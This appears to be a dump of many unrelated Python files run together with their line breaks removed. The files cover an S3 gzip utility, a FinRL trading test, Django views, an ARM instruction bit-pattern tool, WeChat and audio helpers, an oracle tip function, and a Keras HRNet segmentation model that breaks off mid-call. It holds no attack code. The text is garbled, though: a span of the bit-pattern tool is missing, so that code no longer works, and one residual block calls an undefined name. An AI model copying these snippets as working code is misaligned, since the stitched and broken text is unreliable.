bucket_obj: :param object_name: :return: whether the object exists """ try: bucket_obj.Object(object_name).load() except botocore.exceptions.ClientError as e: if e.response['Error']['Code'] == "404": return False raise return True def catch_all(the_function): def new_function(*args, **kwargs): # pylint: disable=broad-except try: return the_function(*args, **kwargs) except Exception as e: print('got exception', e) sys.exit(1) return new_function def process_one_file(basename, full_name, compressed_basename, full_compressed_name, bucket_name): s3 = boto3.resource('s3') bucket = s3.Bucket(bucket_name) print('downloading', full_name, basename) bucket.download_file(full_name, basename) print('zipping', basename, compressed_basename) gzip_file_process(basename, compressed_basename) print('upload', compressed_basename, full_compressed_name) with open(compressed_basename, 'rb') as file_handle: new_object_summary = s3.ObjectSummary(bucket_name, full_compressed_name) new_object_summary.put(Body=file_handle) del new_object_summary print('removing', basename, compressed_basename) os.unlink(basename) os.unlink(compressed_basename) def print_exception(e): print('exception happened', e) sys.exit(1) import pandas as pd import numpy as np def test(start_date, end_date, ticker_list, data_source, time_interval, technical_indicator_list, drl_lib, env, model_name, if_vix = True, **kwargs): from finrl.apps import config # import DRL agents from finrl.drl_agents.stablebaselines3.models import DRLAgent as DRLAgent_sb3 from finrl.drl_agents.rllib.models import DRLAgent as DRLAgent_rllib from finrl.drl_agents.elegantrl.models import DRLAgent as DRLAgent_erl # import data processor from finrl.neo_finrl.data_processor import DataProcessor #fetch data DP = DataProcessor(data_source, **kwargs) data = DP.download_data(ticker_list, start_date, end_date, time_interval) data = DP.clean_data(data) data = DP.add_technical_indicator(data, technical_indicator_list) if if_vix: data = DP.add_vix(data) price_array, tech_array, turbulence_array = DP.df_to_array(data, if_vix) env_config = {'price_array':price_array, 'tech_array':tech_array, 'turbulence_array':turbulence_array, 'if_train':False} env_instance = env(config=env_config) #load elegantrl needs state dim, action dim and net dim net_dimension = kwargs.get('net_dimension', 2**7) cwd = kwargs.get('cwd','./'+str(model_name)) print("price_array: ",len(price_array)) if drl_lib == 'elegantrl': episode_total_assets = DRLAgent_erl.DRL_prediction(model_name=model_name, cwd=cwd, net_dimension=net_dimension, environment=env_instance) return episode_total_assets elif drl_lib == 'rllib': #load agent episode_total_assets = DRLAgent_rllib.DRL_prediction( model_name=model_name, env = env, price_array=price_array, tech_array=tech_array, turbulence_array=turbulence_array, agent_path = cwd) return episode_total_assets elif drl_lib == 'stable_baselines3': episode_total_assets = DRLAgent_sb3.DRL_prediction_load_from_file( model_name=model_name, environment = env_instance, cwd = cwd) return episode_total_assets else: raise ValueError('DRL library input is NOT supported. Please check.') if __name__ == '__main__': from finrl.app.config import DOW_30_TICKER from finrl.app.config import TECHNICAL_INDICATORS_LIST from finrl.app.config import TEST_START_DATE from finrl.app.config import TEST_END_DATE from finrl.app.config import ERL_PARAMS from finrl.app.config import RLlib_PARAMS from finrl.app.config import SAC_PARAMS #construct environment from finrl.neo_finrl.env_stock_trading.env_stock_trading import StockTradingEnv env = StockTradingEnv #demo for elegantrl account_value_erl=test(start_date = TEST_START_DATE, end_date = TEST_END_DATE, ticker_list = DOW_30_TICKER, data_source = 'yahoofinance', time_interval= '1D', technical_indicator_list= TECHNICAL_INDICATORS_LIST, drl_lib='elegantrl', env=env, model_name='ppo', cwd='./test_ppo', net_dimension = 512) #demo for rllib ray.shutdown() #always shutdown previous session if any account_value_rllib = test(start_date = TEST_START_DATE, end_date = TEST_END_DATE, ticker_list = DOW_30_TICKER, data_source = 'yahoofinance', time_interval= '1D', technical_indicator_list= TECHNICAL_INDICATORS_LIST, drl_lib='rllib', env=env, model_name='ppo', cwd='./test_ppo/checkpoint_000030/checkpoint-30', rllib_params = RLlib_PARAMS) #demo for stable baselines3 account_value_sb3=test(start_date = TEST_START_DATE, end_date = TEST_END_DATE, ticker_list = DOW_30_TICKER, data_source = 'yahoofinance', time_interval= '1D', technical_indicator_list= TECHNICAL_INDICATORS_LIST, drl_lib='stable_baselines3', env=env, model_name='sac', cwd='./test_sac.zip') from django.http import HttpResponse, FileResponse, Http404 from django.template import Context,loader from django.shortcuts import render from django.contrib import messages from collections import OrderedDict from .models import post, project, position import os from django.core.paginator import Paginator from pathlib import Path def index(request): context = {} context['static'] = '/static' if request.GET.get('expand_map') == 'yes': context['expand_map'] = 'yes' if request.GET.get('search'): search = request.GET.get('search') post_list = post.objects.filter(md_content__icontains = search) else: post_list = post.objects.all() page = request.GET.get('page') paginator = Paginator(post_list,5) posts = paginator.get_page(page) context['posts'] = posts return render(request, 'index.html',context) def contact(request): context = {} context['static'] = '/static' return render(request, 'contact.html', context) def posts(request, slug): context = {} context['static'] = '/static' try: posts = post.objects.get(slug=slug) except post.DoesNotExist: raise Http404('Post does not exist') context['post'] = posts if request.GET.get('expand_map') == 'yes': context['expand_map'] = 'yes' return render(request, 'post.html', context) def edits(request): # server cant find file without fullpath edits = os.path.join(Path(__file__).parents[1],Path('static/data.geojson')) # file only load in binary mode return FileResponse(open(edits, 'rb')) def services(request): context = {} context['static'] = '/static' return render(request, 'services.html', context) def resume(request): context_resume = {} context_resume['static'] = '/static' if request.GET.get('q') == 'software': context_resume['projects'] = project.objects.all().order_by('-current','-end_date') else: context_resume['position'] = position.objects.all() return render(request, 'resume.html',context_resume) def design(request): context = {} context['static'] = '/static' return render(request, 'design.html', context) def stress_analysis(request): context = {} context['static'] = '/static' return render(request, 'stress_analysis.html', context) def modeling(request): context = {} context['static'] = '/static' return render(request, '3d_modeling.html', context) def programming(request): context = {} context['static'] = '/static' return render(request, 'programming.html', context) arm-binja/tools/syn_bitpats.py10-100 #!/usr/bin/env python import re import sys import ctypes import struct import itertools import common def read_syns(): syns = [] seeds = [] with open('syn_seeds.txt') as fp: for i,line in enumerate(fp.readlines()): m = re.match(r'^(........) (.*)$', line.strip()) seeds.append(int(m.group(1),16)) syns.append(m.group(2)) return [syns, seeds] def read_patterns(): syns = [] pats = [] with open('syn_bitpats.txt') as fp: for i,line in enumerate(fp.readlines()): m = re.match(r'^{.*"(.*)".*$', line.strip()) syns.append(m.group(1)) pats.append(line.strip()) return [syns, pats] def pattern_generate(syn, insword): tmp = common.syntax_from_insword(insword) if syn != tmp: raise Exception('lookup says %08X: -%s- but we see -%s-' % (insword, syn, tmp)) always1 = insword always0 = ctypes.c_uint32(~insword).value # fuzz the insword, see what bits are always 1, always 0 for fuzz in common.fuzz5(): insword2 = insword ^ fuzz syn2 = common.syntax_from_insword(insword2) if syn == syn2: #print '%08X: %s' % (insword2, bin(insword2)[2:]) always1 &= insword2 always0 &= ctypes.c_uint32(~insword2).value else: pass constMaskStr = '' for i in range(31,-1,-1): assert not ((always1 & (1<=0: print(patterns[j]) else: print(pattern_generate(syn, seeds[i])) # assumed a syntax is given, and that's where searching will start else: [syns,seeds] = read_syns() cut = syns.index(sys.argv[1]) print('syns cut at index %d (line %d)' % (cut, cut+1)) for i in range(cut, len(syns)): print(pattern_generate(syns[i], seeds[i])) else: # redo everything [syns,seeds] = read_syns() for (i,syn) in enumerate(syns): print(pattern_generate(syn, seeds[i])) #!/usr/bin/env python # -*- coding: utf-8 -*- import sys import logging import tornado.web import io_weixin_auth class Test2Handler(tornado.web.RequestHandler): def get(self): logging.info('AAA: IN test-get') code = self.get_argument('code', None) token_info = io_weixin_auth.get_user_token_by_code(code) user_info = io_weixin_auth.get_user_info_by_token_info(token_info) self.render('test_001.html', info=user_info) def post(self): logging.info('AAA: IN test-post') self.render('test_001.html') #/* vim: set ai expandtab ts=4 sw=4 sts=4 tw=100: */ AlertaBateria/ReproductorDeSonidos.py class ReproductorWAV: def __init__(self, archivo): self.archivo=archivo print self.archivo def Reproducir(self): import pyaudio import wave #define stream chunk chunk = 1024 #open a wav format music f = wave.open(self.archivo,"rb") #instantiate PyAudio p = pyaudio.PyAudio() #open stream stream = p.open(format = p.get_format_from_width(f.getsampwidth()), channels = f.getnchannels(), rate = f.getframerate(), output = True) #read data data = f.readframes(chunk) #paly stream while data != '': stream.write(data) data = f.readframes(chunk) #stop stream stream.stop_stream() stream.close() #close PyAudio p.terminate() src/telliot_feed_examples/utils/oracle_write.py from typing import Any from typing import Optional from typing import Tuple from telliot_core.contract.contract import Contract from telliot_core.datafeed import DataFeed from telliot_core.utils.response import ResponseStatus from web3.datastructures import AttributeDict from telliot_feed_examples.utils.contract import write_with_retry from telliot_feed_examples.utils.log import get_logger logger = get_logger(__name__) async def tip_query( oracle: Contract, datafeed: DataFeed, tip: int, gas_price: str = "3", retries: int = 2, ) -> Tuple[Optional[AttributeDict[Any, Any]], ResponseStatus]: """Call the TellorX oracle contract's tipQuery function Tip TRB for the given datafeed's query ID to incentivise reporters to report relevant data.""" tx_receipt, status = await write_with_retry( oracle, func_name="tipQuery", gas_limit=350000, legacy_gas_price=int(gas_price), extra_gas_price=20, retries=retries, _queryId=datafeed.query.query_id, _queryData=datafeed.query.query_data, _tip=tip, ) return tx_receipt, status rcommande/passr import functools import types def if_configured(func): @functools.wraps(func) def wrapper(self, *args, **kwargs): if not getattr(self, 'is_configured'): raise Exception("Application not configured") return func(self, *args, **kwargs) return wrapper class Application(object): routes = [] def __init__(self, route_resolver, state_factory): self.route_resolver = route_resolver() self.state_factory = state_factory def configure(self, base_path): self.base_path = base_path self.is_configured = True @if_configured def get_state(self, request): state = self.state_factory(request, self) for view_obj, matchdict in self.route_resolver(request, self): if not isinstance(view_obj, types.FunctionType): state = view_obj(request=request, state=state)(**matchdict) else: state = view_obj(request=request, state=state, **matchdict) return state def route(self, name, path): def wrapper(func): self.routes.append({"name": name, "path": path, "func": func}) @functools.wraps(func) def wrapped(*args, **kwargs): pass return wrapped return wrapper if '__file__' in globals(): import os, sys sys.path.append(os.path.join(os.path.dirname(__file__), '..')) import numpy as np from dezero import Variable import dezero.functions as F x = Variable(np.array([[1, 2, 3], [4, 5, 6]])) c = Variable(np.array([[10, 20, 30], [40, 50, 60]])) t = x + c y = F.sum(t) y.backward(retain_grad=True) print(y.grad) print(t.grad) print(x.grad) print(c.grad)maiyajj/AutoTest_script-Appium_Connect # coding=utf-8 try: from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_001 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_002 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_003 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_004 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_005 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_006 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_007 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_008 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_009 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_010 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_011 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_012 import * from src.testcase.GN_Y201J.case.GN_Y201J_ELECTRICITY_METER.GN_Y201J_ELECTRICITY_METER_013 import * except ImportError as e: print(e) 1-10 import torch import torch.nn.functional as F def ordinal_softmax(x, device='cpu'): """ Convert the ordinal logit output to label probabilities. Parameters ---------- x: torch.Tensor, shape=(num_samples,num_classes-1) Logit output of the final Dense(num_classes-1) layer. device: 'cpu', 'cuda', or None (default='cpu') If GPUs are utilized, then the device should be passed accordingly. Returns ---------- probs_tensor: torch.Tensor, shape=(num_samples, num_classes) Probabilities of each class (columns) for each sample (rows). Examples ---------- >>> ordinal_softmax(torch.tensor([[-1.,1],[-2,2]])) tensor([[0.7311, 0.0723, 0.1966], [0.8808, 0.0142, 0.1050]]) """ # Convert the ordinal logits into cumulative probabilities. log_probs = F.logsigmoid(x).to(device) cum_probs = torch.cat((torch.ones(x.shape[0],1,dtype=torch.float32).to(device), torch.exp(torch.cumsum(log_probs, dim = 1)), torch.zeros(x.shape[0],1,dtype=torch.float32).to(device)), dim=1) return cum_probs[:,0:-1] - cum_probs[:,1:] import tensorflow as tf from tensorflow.keras.models import Model from tensorflow.keras.layers import Input, Conv2D, BatchNormalization, Activation from tensorflow.keras.layers import UpSampling2D, add, concatenate, MaxPool2D, Dropout import tensorflow.keras.backend as K import numpy as np def basic_Block(inputs, out_filters, strides=(1, 1), with_conv_shortcut=False): x = Conv2D(out_filters, 3, padding='same', strides=strides, use_bias=False, kernel_initializer='he_normal')(inputs) x = BatchNormalization(axis=3,)(x) x = Activation('relu')(x) x = Conv2D(out_filters, 3, padding='same', use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization(axis=3)(x) if with_conv_shortcut: residual = Conv2D(out_filters, 1, strides=strides, use_bias=False, kernel_initializer='he_normal')(input) residual = BatchNormalization(axis=3)(residual) x = add([x, residual]) else: x = add([x, inputs]) x = Activation('relu')(x) return x def bottleneck_Block(inputs, out_filters, strides=(1, 1), with_conv_shortcut=False): expansion = 4 de_filters = int(out_filters / expansion) x = Conv2D(de_filters, 1, use_bias=False, kernel_initializer='he_normal')(inputs) x = BatchNormalization(axis=3)(x) x = Activation('relu')(x) x = Conv2D(de_filters, 3, strides=strides, padding='same', use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization(axis=3)(x) x = Activation('relu')(x) x = Conv2D(out_filters, 1, use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization(axis=3)(x) if with_conv_shortcut: residual = Conv2D(out_filters, 1, strides=strides, use_bias=False, kernel_initializer='he_normal')(inputs) residual = BatchNormalization(axis=3)(residual) x = add([x, residual]) else: x = add([x, inputs]) x = Activation('relu')(x) return x # 第一个block, 包括两个3*3的下采样用于图片的输入和 N11 def stem_net(inputs): x = Conv2D(64, 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(inputs) x = BatchNormalization(axis=3)(x) # x = Activation('relu')(x) x = Conv2D(64, 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization(axis=3)(x) x = Activation('relu')(x) x = bottleneck_Block(x, 256, with_conv_shortcut=True) x = bottleneck_Block(x, 256, with_conv_shortcut=False) x = bottleneck_Block(x, 256, with_conv_shortcut=False) x = bottleneck_Block(x, 256, with_conv_shortcut=False) return x # 第一个 def transition_layer1(x, out_chan): x0 = Conv2D(out_chan[0], 3, padding='same', use_bias=False, kernel_initializer='he_normal')(x) x0 = BatchNormalization(axis=3)(x0) x0 = Activation('relu')(x0) x1 = Conv2D(out_chan[1], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x) x1 = BatchNormalization(axis=3)(x1) x1 = Activation('relu')(x1) return [x0, x1] # block1_0 def make_branch1(x, out_chan): x1_0 = basic_Block(x[0], out_chan[0], with_conv_shortcut=False) x1_0 = basic_Block(x1_0, out_chan[0], with_conv_shortcut=False) x1_0 = basic_Block(x1_0, out_chan[0], with_conv_shortcut=False) x1_0 = basic_Block(x1_0, out_chan[0], with_conv_shortcut=False) x1_1 = basic_Block(x[1], out_chan[1], with_conv_shortcut=False) x1_1 = basic_Block(x1_1, out_chan[1], with_conv_shortcut=False) x1_1 = basic_Block(x1_1, out_chan[1], with_conv_shortcut=False) x1_1 = basic_Block(x1_1, out_chan[1], with_conv_shortcut=False) return [x1_0, x1_1] # 不同分辨率之间的交互 def fuse_layer1(x, out_filters): # x0_0 = x[0] x0_1 = Conv2D(out_filters[0], 1, use_bias=False, kernel_initializer='he_normal')(x[1]) x0_1 = BatchNormalization(axis=3)(x0_1) x0_1 = tf.compat.v1.image.resize_bilinear(x0_1, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0 = add([x[0], x0_1]) x0 = Activation('relu')(x0) x1_0 = Conv2D(out_filters[1], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x1_0 = BatchNormalization(axis=3)(x1_0) # x1_1 = x[1] x1 = add([x1_0, x[1]]) x1 = Activation('relu')(x1) return [x0, x1] def transition_layer2(x, out_chan): # x0 = x[0] # x1 = x[1] x2 = Conv2D(out_chan[2], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[1]) x2 = BatchNormalization(axis=3)(x2) x2 = Activation('relu')(x2) return [x[0], x[1], x2] def make_branch2(x, out_filters): x2_0 = basic_Block(x[0], out_filters[0], with_conv_shortcut=False) x2_0 = basic_Block(x2_0, out_filters[0], with_conv_shortcut=False) x2_0 = basic_Block(x2_0, out_filters[0], with_conv_shortcut=False) x2_0 = basic_Block(x2_0, out_filters[0], with_conv_shortcut=False) x2_1 = basic_Block(x[1], out_filters[1], with_conv_shortcut=False) x2_1 = basic_Block(x2_1, out_filters[1], with_conv_shortcut=False) x2_1 = basic_Block(x2_1, out_filters[1], with_conv_shortcut=False) x2_1 = basic_Block(x2_1, out_filters[1], with_conv_shortcut=False) x2_2 = basic_Block(x[2], out_filters[2], with_conv_shortcut=False) x2_2 = basic_Block(x2_2, out_filters[2], with_conv_shortcut=False) x2_2 = basic_Block(x2_2, out_filters[2], with_conv_shortcut=False) x2_2 = basic_Block(x2_2, out_filters[2], with_conv_shortcut=False) return [x2_0, x2_1, x2_2] def fuse_layer2(x, out_chan): x0_1 = Conv2D(out_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[1]) x0_1 = BatchNormalization(axis=3)(x0_1) x0_2 = Conv2D(out_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[2]) x0_2 = BatchNormalization(axis=3)(x0_2) x0_1 = tf.compat.v1.image.resize_bilinear(x0_1, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0_2 = tf.compat.v1.image.resize_bilinear(x0_2, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0 = add([x[0], x0_1, x0_2]) x0 = Activation('relu')(x0) x1_0 = Conv2D(out_chan[1], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x1_0 = BatchNormalization(axis=3)(x1_0) x1_2 = Conv2D(out_chan[1], 1, use_bias=False, kernel_initializer='he_normal')(x[2]) x1_2 = BatchNormalization(axis=3)(x1_2) x1_2 = tf.compat.v1.image.resize_bilinear(x1_2, [tf.shape(x[1])[1], tf.shape(x[1])[2]], align_corners=True) x1 = add([x1_0, x[1], x1_2]) x1 = Activation('relu')(x1) x2_0 = Conv2D(out_chan[0], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x2_0 = BatchNormalization(axis=3)(x2_0) x2_0 = Conv2D(out_chan[2], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x2_0) x2_0 = BatchNormalization(axis=3)(x2_0) x2_1 = Conv2D(out_chan[2], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[1]) x2_1 = BatchNormalization(axis=3)(x2_1) x2 = add([x2_0, x2_1, x[2]]) x2 = Activation('relu')(x2) return [x0, x1, x2] # 变换通道数 def transition_layer3(x, out_chan): # x0 = x[0] # x1 = x[1] # x2 = x[2] x3 = Conv2D(out_chan[3], 3, strides=(2, 2), padding='same', use_bias=False, kernel_initializer='he_normal')(x[2]) x3 = BatchNormalization(axis=3)(x3) x3 = Activation('relu')(x3) return [x[0], x[1], x[2], x3] def make_branch3(x, out_chan): x3_0 = basic_Block(x[0], out_chan[0], with_conv_shortcut=False) x3_0 = basic_Block(x3_0, out_chan[0], with_conv_shortcut=False) x3_0 = basic_Block(x3_0, out_chan[0], with_conv_shortcut=False) x3_0 = basic_Block(x3_0, out_chan[0], with_conv_shortcut=False) x3_1 = basic_Block(x[1], out_chan[1], with_conv_shortcut=False) x3_1 = basic_Block(x3_1, out_chan[1], with_conv_shortcut=False) x3_1 = basic_Block(x3_1, out_chan[1], with_conv_shortcut=False) x3_1 = basic_Block(x3_1, out_chan[1], with_conv_shortcut=False) x3_2 = basic_Block(x[2], out_chan[2], with_conv_shortcut=False) x3_2 = basic_Block(x3_2, out_chan[2], with_conv_shortcut=False) x3_2 = basic_Block(x3_2, out_chan[2], with_conv_shortcut=False) x3_2 = basic_Block(x3_2, out_chan[2], with_conv_shortcut=False) x3_3 = basic_Block(x[3], out_chan[3], with_conv_shortcut=False) x3_3 = basic_Block(x3_3, out_chan[3], with_conv_shortcut=False) x3_3 = basic_Block(x3_3, out_chan[3], with_conv_shortcut=False) x3_3 = basic_Block(x3_3, out_chan[3], with_conv_shortcut=False) return [x3_0, x3_1, x3_2, x3_3] def fuse_layer3(x, num_chan): x0_1 = Conv2D(num_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[1]) x0_1 = BatchNormalization(axis=3)(x0_1) x0_2 = Conv2D(num_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[2]) x0_2 = BatchNormalization(axis=3)(x0_2) x0_3 = Conv2D(num_chan[0], 1, use_bias=False, kernel_initializer='he_normal')(x[3]) x0_3 = BatchNormalization(axis=3)(x0_3) x0_1 = tf.compat.v1.image.resize_bilinear(x0_1, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0_2 = tf.compat.v1.image.resize_bilinear(x0_2, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0_3 = tf.compat.v1.image.resize_bilinear(x0_3, [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x0 = add([x[0], x0_1, x0_2, x0_3]) x0 = Activation('relu')(x0) x1_0 = Conv2D(num_chan[1], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x1_0 = BatchNormalization()(x1_0) x1_2 = Conv2D(num_chan[1], 1, padding='same', use_bias=False, kernel_initializer='he_normal')(x[2]) x1_2 = BatchNormalization()(x1_2) x1_3 = Conv2D(num_chan[1], 1, padding='same', use_bias=False, kernel_initializer='he_normal')(x[3]) x1_2 = tf.compat.v1.image.resize_bilinear(x1_2, [tf.shape(x[1])[1], tf.shape(x[1])[2]], align_corners=True) x1_3 = tf.compat.v1.image.resize_bilinear(x1_3, [tf.shape(x[1])[1], tf.shape(x[1])[2]], align_corners=True) x1 = add([x1_0, x[1], x1_2, x1_3]) x1 = Activation('relu')(x1) x2_0 = Conv2D(num_chan[0], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x2_0 = BatchNormalization()(x2_0) x2_0 = Conv2D(num_chan[2], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x2_0) x2_0 = BatchNormalization()(x2_0) x2_1 = Conv2D(num_chan[2], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[1]) x2_1 = BatchNormalization()(x2_1) x2_3 = Conv2D(num_chan[2], 1, padding='same', use_bias=False, kernel_initializer='he_normal')(x[3]) x2_3 = tf.compat.v1.image.resize_bilinear(x2_3, [tf.shape(x[2])[1], tf.shape(x[2])[2]], align_corners=True) x2 = add([x2_0, x2_1, x[2], x2_3]) x2 = Activation('relu')(x2) x3_0 = Conv2D(num_chan[0], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[0]) x3_0 = BatchNormalization()(x3_0) x3_0 = Conv2D(num_chan[0], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x3_0) x3_0 = BatchNormalization()(x3_0) x3_0 = Conv2D(num_chan[3], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x3_0) x3_0 = BatchNormalization()(x3_0) x3_1 = Conv2D(num_chan[1], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[1]) x3_1 = BatchNormalization()(x3_1) x3_1 = Conv2D(num_chan[3], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x3_1) x3_1 = BatchNormalization()(x3_1) x3_2 = Conv2D(num_chan[3], 3, 2, padding='same', use_bias=False, kernel_initializer='he_normal')(x[2]) x3_2 = BatchNormalization()(x3_2) x3 = add([x3_0, x3_1, x3_2, x[3]]) x3 = Activation('relu')(x3) return [x0, x1, x2, x3] # 最后的输出层 def final_layer(x, classes, size, activation): x0 = x[0] x1 = tf.compat.v1.image.resize_bilinear(x[1], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x2 = tf.compat.v1.image.resize_bilinear(x[2], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x3 = tf.compat.v1.image.resize_bilinear(x[3], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x = concatenate([x0, x1, x2, x3], axis=-1) # x = Conv2D(x.shape[3], 3, 1, use_bias=False, padding='same', kernel_initializer='he_normal')(x) # x = BatchNormalization()(x) # x = Activation('relu')(x) x = tf.compat.v1.image.resize_bilinear(x, size, align_corners=True) x = Conv2D(x.shape[3], 1, 1, use_bias=False, kernel_initializer='he_normal')(x) x = BatchNormalization()(x) x = Activation('relu')(x) x = Conv2D(classes, 1, kernel_initializer='he_normal')(x) if activation in {'softmax', 'sigmoid'}: x = Activation(activation, name=activation)(x) return x def seg_hrnet(batch_size, height, width, channel, classes, activation='softmax', hrnet_type='hrnet_w48'): if hrnet_type == 'hrnet_w18': size = [18, 36, 72, 144] elif hrnet_type == 'hrnet_w32': size = [32, 64, 128, 256] elif hrnet_type == 'hrnet_w48': size = [48, 96, 192, 384] else: raise ValueError("Unsupported hrnet type!") inputs = Input(batch_shape=(batch_size,) + (height, width, channel)) x = stem_net(inputs) x = transition_layer1(x, size[:2]) for i in range(1): x = make_branch1(x, size[:2]) x = fuse_layer1(x, size[:2]) x = transition_layer2(x, size[:3]) for i in range(4): x = make_branch2(x, size[:3]) x = fuse_layer2(x, size[:3]) x = transition_layer3(x, size) for i in range(3): x = make_branch3(x, size) x = fuse_layer3(x, size) out = final_layer(x, classes=classes, size=(tf.shape(inputs)[1], tf.shape(inputs)[2]), activation=activation) model = Model(inputs=inputs, outputs=out) return model def spatial_gather_module(feats, probs, scale): batch_size, h, w, c = probs.get_shape().as_list() probs = tf.transpose(tf.reshape(probs, (batch_size, -1, c)), [0, 2, 1]) feats = tf.reshape(feats, (batch_size, -1, feats.shape[3])) # feats = tf.transpose(feats, [0, 2, 1]) # batch, h*w, c probs = K.softmax(scale * probs, axis=2) # batch, k, h*w # ocr_context = tf.expand_dims(tf.transpose(tf.matmul(probs, feats), [0, 2, 1]), axis=3) ocr_context = tf.expand_dims(tf.matmul(probs, feats), axis=2) return ocr_context def SpatialOCR_Module(feats, proxy_feats, key_chan, out_chan, scale=1, dropout=0.1): batch_size, h, w, c = feats.get_shape().as_list() if scale > 1: feats = MaxPool2D((scale, scale)) # f_pixel query = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(feats) query = BatchNormalization(axis=3)(query) query = Activation('relu')(query) query = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(query) query = BatchNormalization(axis=3)(query) query = Activation('relu')(query) query = tf.reshape(query, [batch_size, -1, key_chan]) # batch, h*w, chan # f_object key = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(proxy_feats) key = BatchNormalization(axis=3)(key) key = Activation('relu')(key) key = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(key) key = BatchNormalization(axis=3)(key) key = Activation('relu')(key) key = tf.transpose(tf.reshape(key, [batch_size, -1, key_chan]), (0, 2, 1)) # f_down value = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(proxy_feats) value = BatchNormalization(axis=3)(value) value = Activation('relu')(value) value = tf.reshape(value, [batch_size, -1, key_chan]) sim_map = tf.matmul(query, key) sim_map = (key_chan ** -.5) * sim_map sim_map = K.softmax(sim_map, axis=-1) # add bg context context = tf.matmul(sim_map, value) context = tf.reshape(context, [batch_size, tf.shape(feats)[1], tf.shape(feats)[2], key_chan]) # f_up context = Conv2D(key_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(context) context = BatchNormalization(axis=3)(context) context = Activation('relu')(context) if scale > 1: context = UpSampling2D(size=(scale, scale), interpolation='bilinear')(context) output = concatenate([context, feats], axis=-1) output = Conv2D(out_chan, 1, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(output) output = BatchNormalization(axis=3)(output) output = Activation('relu')(output) output = Dropout(dropout)(output) return output def ocr_module(x, classes=1, activation='sigmoid'): x0 = x[0] x1 = tf.compat.v1.image.resize_bilinear(x[1], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x2 = tf.compat.v1.image.resize_bilinear(x[2], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) x3 = tf.compat.v1.image.resize_bilinear(x[3], [tf.shape(x[0])[1], tf.shape(x[0])[2]], align_corners=True) feats = concatenate([x0, x1, x2, x3], axis=-1) out_aux = Conv2D(feats.shape[3], 1, 1, padding='same', use_bias=True, kernel_initializer='he_normal')(feats) out_aux = BatchNormalization(axis=3)(out_aux) out_aux = Activation('relu')(out_aux) out_aux = Conv2D(classes, 1, 1, padding='same', use_bias=True, kernel_initializer='he_normal')(out_aux) feats = Conv2D(512, 3, 1, padding='same', use_bias=False, kernel_initializer='he_normal')(feats) feats = BatchNormalization()(feats) feats = Activation('relu')(feats) context = spatial_gather_module(feats, out_aux, scale=1) feats = SpatialOCR_Module(feats, context, key_chan=256, out_chan=512, scale=1, 